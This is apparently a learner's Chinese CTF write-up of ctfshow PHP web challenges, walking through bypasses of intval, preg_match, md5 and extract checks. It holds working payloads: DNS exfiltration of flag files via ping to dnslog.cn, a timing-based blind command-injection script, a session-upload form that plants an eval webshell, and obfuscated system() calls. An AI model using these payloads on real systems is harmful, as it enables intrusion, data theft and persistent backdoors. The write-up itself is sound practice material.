这里以半做题,半学习为主,所以就显得比较啰嗦
阿巴阿巴,但是实际上,写得比较水,等过一段时间再总结一下
比较深刻的印象是:下一个手册,多看手册
从web135还是几开始,就是看的这个师傅的博客了
if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } }
preg_match()函数一个漏洞 无法处理数组
所以构造数组绕过:
?num[]=1 ?num[]=也行
额,写了一个小脚本测试了一下
也算是传入了值的(算是传入了空嘛),所以数组中有元素
传入的元素是字符串类型的。
if(isset($_GET['num'])){ $num = $_GET['num']; if($num==="4476"){ die("no no no!"); } if(intval($num,0)===4476){ echo $flag; }else{ echo intval($num,0); } }
所以考虑传入一个16进制或者8进制的了
payload
?num=010574 ?num=0x117c ?num=4476a
intval()函数如果$base为0,则$var中存在字母的话遇到字母就停止读取,传入4476a会将后面的a丢弃,比较前面的
show_source(__FILE__); include('flag.php'); $a=$_GET['cmd']; if(preg_match('/^php$/im', $a)){ if(preg_match('/^php$/i', $a)){ echo 'hacker'; } else{ echo $flag; } } else{ echo 'nonononono'; }
额,做题犯迷糊了,主要是一直想不懂phpphp%0aphp
和php%0aphp
可以拿到flag,
一直没理解到,好吧,现在也迷糊。因为是学习,所以不能直接拿到flag就过了
原来是正则理解错了,/^php$/
只能够匹配'php'
,当时鬼使神差的以为是首尾是php就行
正本表达式全集
payload
?cmd=%0aphp 第一个if,因为它是多行匹配,所以匹配第二行的php过滤 第二个if,因为我们传入%0a是空格,在文件夹中的显示(如下图),所以没有匹配上
在padnote++中视图,显示字符,设置的全部显示
看了一下hint,里面有一个关于文件上传中Apache解析的漏洞
Apache HTTPD 换行解析漏洞(CVE-2017-15715)与拓展
利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单
简单来说就是,Apache2.4.0~2.4.29中在.php的16进制后面加上0a被解析为PHP文件执行了(在利用.php.xxx)绕过那一关,离谱,burp2021没有hex的选项,所以在后面添加0x0a有需要百度一下。对文件上传的脚本也有要求,限制条件有点多,还是请看看上面两个博客。
if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(intval($num,0)==4476){ echo $flag; }else{ echo intval($num,0); } }
感觉和web89差不多,payload:
?num=0x117c 因为是个字符串(前面有演示,只是用的数据是123456),所以第一个判断绕过了 intval检查字符串首部是不是0x,是就当做16进制解析为10进制,且117c的十进制是4476 所以通过判断
intval()函数如果$base为0,则$var中存在字母的话遇到字母就停止读取
但是e这个字母比较特殊,可以在PHP中不是科学计数法。
所以为了绕过前面的==4476
我们就可以构造 4476e123 其实不需要是e其他的字母也可以
不过问题是,说的能用其它字符,但是只有e是可以的,由于懒(但是不能懒),所以写一个脚本进行测试,发现,确实只有e才能够得flag,不然第一个判断,强弱类型比较就nonono了
再进行php脚本的一个判断输入的4476e123为什么类型
一般是使用?id=1'
进行判断。在这之前,可以传入一个?id[]=1
的数组进去;
如果返回页面是:?id=1
,那么就可以找下一个注入点了,因为接受id的代码写法可能是
$id=intval($_GET['id']);
web92+过滤输入的字母
payload:?num=010574
利用8进制绕过
if(isset($_GET['num'])){ $num = $_GET['num']; if($num==="4476"){ die("no no no!"); } if(preg_match("/[a-z]/i", $num)){ die("no no no!"); } if(!strpos($num, "0")){ die("no no no!"); } if(intval($num,0)===4476){ echo $flag; }}strpos查找"0"在$num中第一次出现的位置。如果匹配不了也返回NULL;
PHP strpos()函数,W3school
payload
?num=4476.01 必须加一个0,否则第三个判断会因为匹配不到0,而返回空?num=空格010574 加上一个空格过滤,不太清楚原因?num=%20010574 加上一个空格的url编码,不太清楚原因?num=%0a010574 加深换行符的url编码?num=+010574 加上+,不太清楚原因?num=%2b010574 加上+的url编码,不太清楚原因
if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!"); } if(!strpos($num, "0")){ die("no no no!!!"); } if(intval($num,0)===4476){ echo $flag; }}过滤了小数点,还将强匹配改成了弱匹配
payload
?num=空格010574 前面加一个空格过滤,不太清楚原因?num=%20010574 加上空格的url编码,不太清楚原因?num=%0a010574 加深换行符的url编码
写了一个脚本,跑了一下,看看那些字符添加之后,不会影响intval()函数的运行,有的是不可见字符,就直接给出asc的十六进制了。脚本就放下面了,名字是:不会影响intval()的可见与不可见字符
1:0x9字符是 水平定位符2:0xa字符是 换行符3:0xb字符是 垂直定位符4:0xc字符是 换页键5:0xd字符是 归位符6:0x20字符是 控制设备4(空格)7:0x2b字符是 +
if(isset($_GET['u'])){ if($_GET['u']=='flag.php'){ die("no no no"); }else{ highlight_file($_GET['u']); }}
payload
绝对路径:/var/www/html/flag.php相对路径:./flag.php
伪协议:(我一直以为伪协议只有用在include中才能用)
?u=php://filter/convert.base64-encode/resource=flag.php
if (isset($_POST['a']) and isset($_POST['b'])) {if ($_POST['a'] != $_POST['b'])if (md5($_POST['a']) === md5($_POST['b']))echo $flag;elseprint 'Wrong.';}?>
payload
post a[]=&b[]=123
理解不了,强行记忆
传入数组,比较时,比较传入对象(数组也算对象)的元素,在进行md5加密判断时,md5()函数加密的都是空字符
<?include("flag.php");$_GET?$_GET=&$_POST:'flag'; $_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);?>
$_GET变量是什么 $_SERVER是什么(头信息)
是真的有点绕,简单来说,首先要看懂三目运算符,接着要看懂引用。
$_GET
和$_POST
分别采集get和post表单中的数据,是数组,$_GET=&$_POST
意思是,给$_GET
赋值为$_POST
的值。简单来说就是,$_GET['123']=1
成了$_POST['123']=123
,大概就是这样。
?a=apsot flag=asdf&HTTP_FLAG=flag?a=apost HTTP_FLAG=flag?a=apost flag=flagcookie HTTP_FLAG=flag
博客写得很简陋,可以看看这个
php函数的传值与传址(引用)详解
php三元运算符与if的详解
$allow = array();for ($i=36; $i < 0x36d; $i++) { array_push($allow, rand(1,$i));}if(isset($_GET['n']) && in_array($_GET['n'], $allow)){ file_put_contents($_GET['n'], $_POST['content']);}
额,试了一手,没得过滤,看了一下hint,说的是in_array
没有设置第三个参数,就会将n=1.php自动转换为1
?n=45.phppost content=<?php system('tac flag36d.php');?>
include("ctfshow.php");//flag in class ctfshow;$ctfshow = new ctfshow();$v1=$_GET['v1'];$v2=$_GET['v2'];$v3=$_GET['v3'];$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);if($v0){ if(!preg_match("/\;/", $v2)){ if(preg_match("/\;/", $v3)){ eval("$v2('ctfshow')$v3"); } } }
注意一点:and是或的意思,请看:额,不看了,记住是或不是且就行
然后payload,忘了,
v1=1&v2=eval($_POST[1])?>&v3=;或者v1=1&v2=var_dump($ctfshow)/*&v3=*/;(有点好奇,不封闭,不影响吗)
学习了,学习了
利用反射类,Relectionclass()
函数,作用:根据类名反射一个类。在代码执行时,加入输入一个A,但是在逻辑判断之后,生成了一个B类,所以这时,用Relectionclass("A")来限定生成A类。
payload
echo new Reflectionclass('ctfshow')
拿到flag之后,因为flag比以前少了一位,所以要在末尾添加一个字符,进行爆破
题目:substr(字符串,起始位置,[结束位置]):截取字符串长度call_user_func 把第一个参数作为回调函数调用,后面的参数作为给回调函数的参数
$v1 = $_POST['v1'];$v2 = $_GET['v2'];$v3 = $_GET['v3'];$v4 = is_numeric($v2) and is_numeric($v3);if($v4){ $s = substr($v2,2); $str = call_user_func($v1,$s); echo $str; file_put_contents($v3,$str);}else{ die('hacker');}
用hint的方法就行,
get ?v2=1·44383959474e6864434171594473&v3=php://filter/convert.base64-decode/resource=1.phppost v1=hex2binhex2bin 转换十六进制字符串为二进制字符串
v2=115044383959474e6864434171594473:去掉前两位数字(11,用来绕过substr)的截断。同时也是16进制编码的PD89YGNhdCAqYDs
,而PD89YGNhdCAqYDs
解码出来是:<?=
cat *;
因为有e
,所以被当做了科学计数法的数字(7.0.0及以下,也会将0x开头的当做数字)。
再结合v1=hex2bin
将v2转化为PD89YGNhdCAqYDs
,再通过v3实现伪协议的base64-decode通道解码
白嫖102
没有任何的过滤机制,所以直接上传两个相同的就是了
比较典型的参数覆盖,仔细看看代码就看得懂。
payload
1:?suces=flag&flag= 从die($suces)输出flag2:?suces=flag post error=suces 从die($error)输出flag:
include('flag.php');$error='你还想要flag嘛?';$suces='既然你想要那给你吧!';foreach($_GET as $key => $value){ if($key==='error'){ die("what are you doing?!"); } $$key=$$value; /* get传入suces=flag,所以$suces=$flag(答案,已经进行了赋值) 若传入flag=,所以$flag=空,用来绕过一个判断*/}foreach($_POST as $key => $value){ if($value==='flag'){ die("what are you doing?!"); } $$key=$$value;}if(!($_POST['flag']==$flag)){ die($error);}echo "your are good".$flag."\n";die($suces);?>
同md5上传数组
if(isset($_POST['v1'])){ $v1 = $_POST['v1']; $v3 = $_GET['v3']; parse_str($v1,$v2); if($v2['flag']==md5($v3)){ echo $flag; }}
parse_str — 将字符串解析成多个变量,也就是说,v1传递的值,以数组方式放到v2中去了。
payload1
get ?v3=1post v1=flag=c4ca4238a0b923820dcc509a6f75849bmd5(1)=c4ca4238a0b923820dcc509a6f75849b
payload2
如果v3提交一个数组,返回值是NULL,那么可以不提交v2
get v3[]=1post v1=
payload3
get ?v3=240610708post v1=flag=0
if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE) { die('error');}//只有36d的人才能看到flagif(intval(strrev($_GET['c']))==0x36d){ echo $flag;}ereg():正则表达式函数,没有preg_match好用strrev():字符串的倒叙
ereg()函数用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回true,否则,则返回false。搜索字 母的字符是大小写敏感的。 ereg函数存在NULL截断漏洞,导致了正则过滤被绕过,所以可以使用%00截断正则匹配
get ?c=a%00778
if(isset($_GET['v1']) && isset($_GET['v2'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){ eval("echo new $v1($v2());"); }}
paylaod
v1=Exception&v2=system('cat fl36dg.txt')
if(isset($_GET['v1']) && isset($_GET['v2'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v1)){ die("error v1"); } if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v2)){ die("error v2"); } eval("echo new $v1($v2());");}?>
payload1
get ?v1=FilesystemIterator&v2=getcwd getcwd():获取当前文件目录FilesystemIterator&遍历文件的类DirctoryIntrerator 遍历目录的类
利用全局变量
?v1=ctfshow&v2=GLOBLS
可以直接
php://filter/read/resource
在web 112对的基础上过滤了php
function filter($file){ if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){ die('hacker!'); }else{ return $file; }}$file=$_GET['file'];if(! is_file($file)){ highlight_file(filter($file));}else{ echo "hacker!";}
payload
compress.zlib://flag.php
hint:利用目录溢出,从而让is_file认为不是一个文件
highlight_file()不能够高亮数组,没有过滤php和filter
payload
?file=php://filter/resource=flag.php
function filter($num){ $num=str_replace("0x","1",$num); $num=str_replace("0","1",$num); $num=str_replace(".","1",$num); $num=str_replace("e","1",$num); $num=str_replace("+","1",$num); return $num;}$num=$_GET['num'];if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){ if($num=='36'){ echo $flag; }else{ echo "hacker!!"; }}else{ echo "hacker!!!";}
%0C
:换页键
可能会有个问题,就是说,在filter()函数中,过滤了0
,但是这里为什么能用%0c
呢。因为,如果需要传入不可见字符,但是没有办法,表示,所以就用了%+16进制数
来代表添加的对应的符号,例如这里的%0c
,虽然写得有0
,但是上传之后,%0c
表示换页键,是一个不可见字符
PHP变量名应该只有数字字母下划线,同时GET或POST方式传进去的变量名,会自动将空格 + . [转换为_
但是有一个特性可以绕过,使变量名出现.之类的
特殊字符[, GET或POST方式传参时,变量名中的[也会被替换为_,但其后的字符就不会被替换了
如 CTF[SHOW.COM=>CTF_SHOW.COM
payload
1.get CTF_SHOW=2&CTF[SHOW.COM=1&fun=echo $flag2.get CTF_SHOW=2&CTF[SHOW.COM=1&fun=echo implode(get_defined_vars())
include("flag.php");$a=$_SERVER['argv'];$c=$_POST['fun'];if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print/i", $c)&&$c<=16){ eval("$c".";"); if($fl0g==="flag_give_me"){ echo $flag; } }}在web124的基础上过滤了echo print_r var_dump
不过,可以使用var_export来进行输出,所以payload
CTF_SHOW=2&CTF[SHOW.COM=1&fun=var_export(get_defined_vars())
1.覆盖fl0g(最骚)
函数:extract():从数组中将变量导入到当前的符号表
所以payload
CTF_SHOW=2&CTF[SHOW.COM=1&fl0g=flag_give_me&fun=extract($_POST)
2.文件包含
利用执行的eval,在fun中传入highlight_file($_GET[1])
payload
get ?1=flag.phppost CTF_SHOW=2&CTF[SHOW.COM=1&fun=highlight_file($_GET[1])
3.argv上传
argv只接受get传入参数,post方式不行
同样,通过eval执行$a,对$fl0g进行赋值
paylaod
get ?$fl0g=flag_give_me;post CTF%5BSHOW.COM=1&CTF_SHOW=2&fun=eval($a[0])
4.argv上传——改
get: a=1+fl0g=flag_give_mepost: CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])get /?$fl0g=flag_give_mepost CTF_SHOW=&CTF[SHOW.COM=&fun=assert($a[0])
解法详情,点击跳转
嫖web125,argv上传的做法
$_SERVER['QUERY_STRING']是获取url后面的参数以及值的,
于是只能传递一个参数
所以这个题的考点是,怎么构造一个下划线。首先我们是知道[ . 空格
会被转化为下划线,恰好没过滤空格,所以
payload
ctf show=ilove36d
嗯,这里打算跑一下,有哪些字符会被转换为_
。
结果是:空格 + . [
会被转化为_
$f1 = $_GET['f1'];$f2 = $_GET['f2'];if(check($f1)){ var_dump(call_user_func(call_user_func($f1,$f2)));}else{ echo "嗯哼?";}function check($str){ return !preg_match('/[0-9]|[a-z]/i', $str);}call_user_func()把第一个参数作为回调函数,剩下的作为给回调函数的参数
新知识:
gettext()函数有一个别名:_
gettext()的作用就是输出一个字符串,
所以payload:
f1=_&f2=get_defined_vars
if(isset($_GET['f'])){ $f = $_GET['f']; if(stripos($f, 'ctfshow')>0){ echo readfile($f); }}
额,说的是考虑目录穿越,于是试了一下
./ctfshow/../index.php
接着尝试
./ctfshow/../flag.php
发现是空白的,顺手看眼源代码,能读到index.php所以应该能读到flag.php
?我直接上传f=ctfshow
成功了?
/is s是匹配换行
因为/.+?ctfshow/is
前面是.+?
,意思是,在ctfshow字符串前面有至少一个字符。所以直接上传ctfshow能拿到flag。
如果设置表达式为:(.+)?
那么ctfshow就无法绕过了
include("flag.php");if(isset($_POST['f'])){ $f = (String)$_POST['f']; if(preg_match('/.+?ctfshow/is', $f)){ die('bye!'); } if(stripos($f,'36Dctfshow') === FALSE){ die('bye!!'); } echo $flag;}
这个题考的是,正则表达式溢出,新知识了。
php正则表达式进行匹配有限制,超过限制直接返回flase
php正则失效-最大回溯(pcre.backtrack_limit)/递归限制
正则表达式,对一百万长度后面的就不匹配了。
直接用hint的就行,如果复制粘贴太卡,可以试试这个脚本
import requestsurl='http://ced5ea6a-1d3b-4f66-a3ff-61a42deeaec4.challenge.ctf.show:8080/'data={ 'f':'show'*250002+'36Dctfshow'}re=requests.post(url=url,data=data).textprint(re)
访问robots.txt,发现有一个admin目录,访问得到
if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){ $username = (String)$_GET['username']; $password = (String)$_GET['password']; $code = (String)$_GET['code']; if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){ if($code == 'admin'){ echo $flag; } }}
嗷,对了忘了说,这里建议下载一个手册,查函数的时候是真的方便
php中逻辑运算符的高效用法&&和||
所以,看代码;我们没有办法预测mt_rand()
函数的值,又看运算;其实,一眼望过去,会发现,第一第二个判断都是无法预测无法构造的,只能是FALSE,巧就巧在,前两个过了,后面的username
能够进入判断和能够利用;
所以对username进行赋值admin,又由于code也要等于admin,所以给code也赋值为admin,反正code字符串时肯定不等于mt_rand()的随机数的。password没得什么用,不复制也行
?username=admin&password=&code=admin
这题有点没看懂,没懂这个方法原理是怎么样的。
给我的感觉是,访问一个地址,然后在地址查询记录;恰好有个在线工具
每次外带只能带一条输出来,让后执行命令
payload是
?F=`$F`;+`ping "cat flag.php|grep ctfshow".atqwxp.dnslog.cn -c 1`
显然没构造对,,,,
?F=`$F`;+ping `cat flag.php|grep ctfshow`.atqwxp.dnslog.cn -c 1
先理解一下是怎么把flag带出来的,接着再看怎么执行带出flag的语句
传入的是?F=`$F`;+ping `xxx```在PHP中相当于是shell_exec()的函数别名,类似gettext()函数别名为_()代码中进行了前六位的截断,就只有`$F`;空格 +上传之后是空格又因为$F=`$F`;+ping `xxx`;所以,截断后,执行的代码是 eval(`$F`; ping `xxx`),为什么前面还是有`$F`呢?,因为$F=`$F`;+ping `xxx`;套娃了然后通过构造xxx,把flag拿出来,进行拼接,接着ping一下,sss.dnslog.cn。最后查看记录
大概就是这么一个意思
出题师傅的wp
群主师傅B站的讲解
highlight_file(__FILE__);$key1 = 0;$key2 = 0;if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) { die("nonononono");}@parse_str($_SERVER['QUERY_STRING']);extract($_POST);if($key1 == '36d' && $key2 == '36d') { die(file_get_contents('flag.php'));}a&&b 如果a错误,不走ba||b 如果b正确,不走b$_SERVER['QUERY_STRING']是获取get的参数以及值的extract 从数组中将变量导入到当前的符号表(简单来说就是,将数组里的键给搞成变量,将数组的值给对应的键)
payload
get ?_POST[key1]=36d&_POST[key2]=36d原因是:@parse_str($_SERVER['QUERY_STRING']); 将数据转化为了,$_POST[key1]=36d接着extract($_POST)将$_POST[key1]=36d转化为了$key=36d
和web133差不多的方式,只是需要换一个nl flag
?F=`$F`;+ping `nl flag.php|awk 'NR==15'|tr -cd "[a-z]"/"[0-9]"/"{"/"-"`.4qv6n3.dnslog.cn -c 1
拿到第一个flagflag1=ctfshow{fbfe4223341
,就是有点不懂,为啥不加正则不行
然后有用 命令查看了一下是不是还有其他的文件,发现没有
最后看了视频才知道,原来在16行
if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){ die('too young too simple sometimes naive!'); }}if(isset($_GET['c'])){ $c=$_GET['c']; check($c); exec($c);}else{ highlight_file(__FILE__);}
这个要新学一个Linux的 命令:tee
payload
get ?c=ls /|tee 1 扫描根目录,将结果存入文件1中,由于过滤了. 所以不能加后缀然后访问url/1get ?c=nl /f149_15_h3r3|tee 2
拿到flag
额,观察一波,传入一个ctfshow类中的方法
payload
post ctfshow=ctfshow::getFalg
import requestscmd = 'cat /f149_15_h3r3'result = ''for i in range(1, 10): for j in range(1, 50): print('i=', i, ' j=', j) for k in range(32, 128): k = chr(k) payload = f"if [ `{cmd} |awk NR=={i}|cut -c {j}` == {k} ]; then sleep 3;fi" payload = '?c=' + payload url = 'http://15531f1c-3c8e-4e3f-9f0c-163a616f390d.challenge.ctf.show:8080/' try: requests.get(url + payload, timeout=(2.5, 2.5)) except: result = result + k print(result) break result = result + "\n"
if(isset($_POST['f1']) && isset($_POST['f2'])){ $f1 = (String)$_POST['f1']; $f2 = (String)$_POST['f2']; if(preg_match('/^[a-z0-9]+$/', $f1)){ if(preg_match('/^[a-z0-9]+$/', $f2)){ $code = eval("return $f1($f2());"); if(intval($code) == 'ctfshow'){ echo file_get_contents("flag.php"); } } }}
这里看到eval,说实话,一开始想到的是命令执行,或者是外带,或者是反射类,执行出来一个ctfshow字符串或者是。试了一下都不行,最后看了一下别人的博客,说的是只要eval执行的结果是0或者是NULL就行,但是不能报错。
最后仔细一看,用弱比较过的判断。intval()函数出来的必是一个数字,数字和字符串这里进行弱比较,数子就得是0了。
payload,随便用哪一个
post f1=usleep&f2=usleeppost f1=gmdate&f2=gmdatepost f1=intval&f2=intval
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = (String)$_GET['v1']; $v2 = (String)$_GET['v2']; $v3 = (String)$_GET['v3']; if(is_numeric($v1) && is_numeric($v2)){ if(preg_match('/^\W+$/', $v3)){ $code = eval("return $v1$v3$v2;"); echo "$v1$v3$v2 = ".$code; } }}is_numeric — 检测变量是否为数字或数字字符串 (是,true;否,false)
利用|
运算来进行代码执行,看的这一位师傅的wp
payload
?v1=1&v2=1&v3=*("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%03%01%14%20%06%0c%01%07%02%10%08%10"|"%60%60%60%20%60%60%60%60%2c%60%60%60");systemcat flag.php
使用system('cat flag.php')
不行
payload:
?v1=0
从这里开始建议去看这个博客了,我的代码始终有点问题
看的这一位师傅的wp
payload
?v1=1&v2=2&v3=*("%13%19%13%14%05%0d"^"%60%60%60%60%60%60")("%03%01%14%00%06%0c%01%07%02%10%08%10"^"%60%60%60%20%60%60%60%60%2c%60%60%60")?>
import recontent=''count=0preg='[a-z]|[0-9]|\@|\!|\+|\-|\.|\_|\$|\}|\%|\&|\;|\<|\>|\*|\/|\^|\#|\"'for i in range(1,256): for j in range(1,256): if not (re.match(preg,chr(i),re.I) or re.match(preg,chr(j),re.I)): k=i^j if 32<=k<=126: a='%'+hex(i)[2:].zfill(2) b='%'+hex(j)[2:].zfill(2) content=content+chr(k)+' '+a+' '+b+'\n'#print(content)f=open('exp_yh.txt','w')f.write(content)f.close()# print('pass'+chr(i)+'==>'+str(i))while True: payload1='' payload2='' payload='' code=input('data: ') f=open('exp_yh.txt','r') lines=f.readlines() for c in code: for line in lines: if c==line[0:1]: payload1=payload1+line[2:5] payload2=payload2+line[6:9] break payload='("'+payload1+'"^"'+payload2+'")' print('payload:'+payload)
因为是学习,不能总是抄别人的代码,于是额手打了一次
?v1=1&v3=2&v2=*(%22%08%02%08%08%05%0d%22^%22%7b%7b%7b%7c%60%60%22)(%22%03%01%08%07%06%0c%01%07%02%0b%08%0b%22^%22%60%60%7c%27%60%60%60%60%2c%7b%60%7b%22)
?v1=1&v2=2&v3=|('%13%19%13%14%05%0d'|'%60%60%60%60%60%60')('%03%01%14%20%06%0c%01%07%02%10%08%10'|'%60%60%60%20%60%60%60%60%2c%60%60%60')|
格式1|()|2
或者1?()2
同上
由于命名空间问题,如果要绝对调用一个函数,例如system,那么就要写成\system
php里默认命名空间是\,所有原生函数和类都在这个命名空间中。 普通调用一个函数,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路 径; 而如果写\function_name()这样调用函数,则其实是写了一个绝对路径。 如果你在其他namespace里调用系统类,就必须写绝对路径这种写 法
paylaod
?show=;};phpinfo();/*ctf=\create_function
create_function详细利用请看
代码审计值create_function()函数
payload1
?code=("%08%02%08%09%05%0d"^"%7b%7b%7b%7d%60%60")("%03%01%09%01%06%0c%01%07%01%0b%08%0b"^"%60%60%7d%21%60%60%60%60%2f%7b%60%7b");查看源代码
条件竞争,没有过滤,线程开高点
然后再调高一些
可以尝试用上传文件的形式做,
首先要知道怎么绕过过滤,然后执行include($ctf)
审计代码之后发现,有一个extract($_GET)
,可以用来上传$isVIP=1
绕过$isVIP。extract
作用就不在赘述了
接着通过post上传ctf,如果用get方式传递,会被过滤。从ctf
上传/tmp/sess_test
如图 :
所以,在题目中,上传ctf=/tmp/sess_test
,那么/tmp/sess_test
会被加载,如果文件满足PHP格式,那么通过include后会执行PHP部分代码。详情可以看文件包含_web82
接着写一个上传文件的html代码,上传,同时在题目界面发送post的请求。
<html><body><form action="http://02b60c98-5818-4f14-b442-bfab88477ae3.challenge.ctf.show:8080/" method="POST" enctype="multipart/form-data"><input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php file_put_contents('/var/www/html/test1.php','<?php eval($_POST[test1]);?>');?>" /><input type="file" name="file" /><input type="submit" value="submit" /></form></body></html>
反复上传,直到能够访问url/test1.php,接着利用rce拿到flag
题目和150几乎一样,只是了一个log过滤
方法同web150
这个方法,怎么说呢,感觉只要没有过滤_ \
,几乎就是万能的了,顶不住。
intval原理:https://www.runoob.com/php/php-intval-function.html,反复多看几次
不绕过方式:(额,就是进入了这个判断,if成功,才能拿到flag,不是else)
空格
,空格的url编码 %20
,换行符的url编码 %0a
+
,+的url编码 %2b
1:0x9字符是 水平定位符2:0xa字符是 换行符3:0xb字符是 垂直定位符4:0xc字符是 换页键5:0xd字符是 归位符6:0x20字符是 控制设备4(空格)7:0x2b字符是 +
import requests# 额,所用的url是web95的题目环境;代码写的烂,请将就将就url='http://74959170-6cdd-4bd3-9e06-3c749b1aa773.challenge.ctf.show:8080/'url_test=url+'?num=010574'url_right=url+'?num= 010574'exp_len=len(requests.get(url_test).text)right_len=len(requests.get(url_right).text)useful=''num=1for i in range(1,255): URL=url+'?num='+chr(i)+'010574' lenth=len(requests.get(url=URL).text) #print (chr(i)) if lenth!=exp_len: print(str(lenth)+'========>'+chr(i)+'====>'+str(hex(i))) if lenth==right_len: useful=useful+str(num)+':'+str(hex(i))+'字符是'+chr(i)+'\n'#+URL+'\n' num+=1 print(exp_len)print(right_len)print(useful)
多嘴一句,咋们貌似还可以将255给调大点,虽然后面的貌似都没有什么作用
八卦都整出来了,都没有合适的(吃饭的时候跑了一下玩一玩)
web 101
SplFileInfomysqliexception
特点:只会给6个位置,没过滤反引号
利用https://dnslog.cn来讲查询到的flag带出道记录中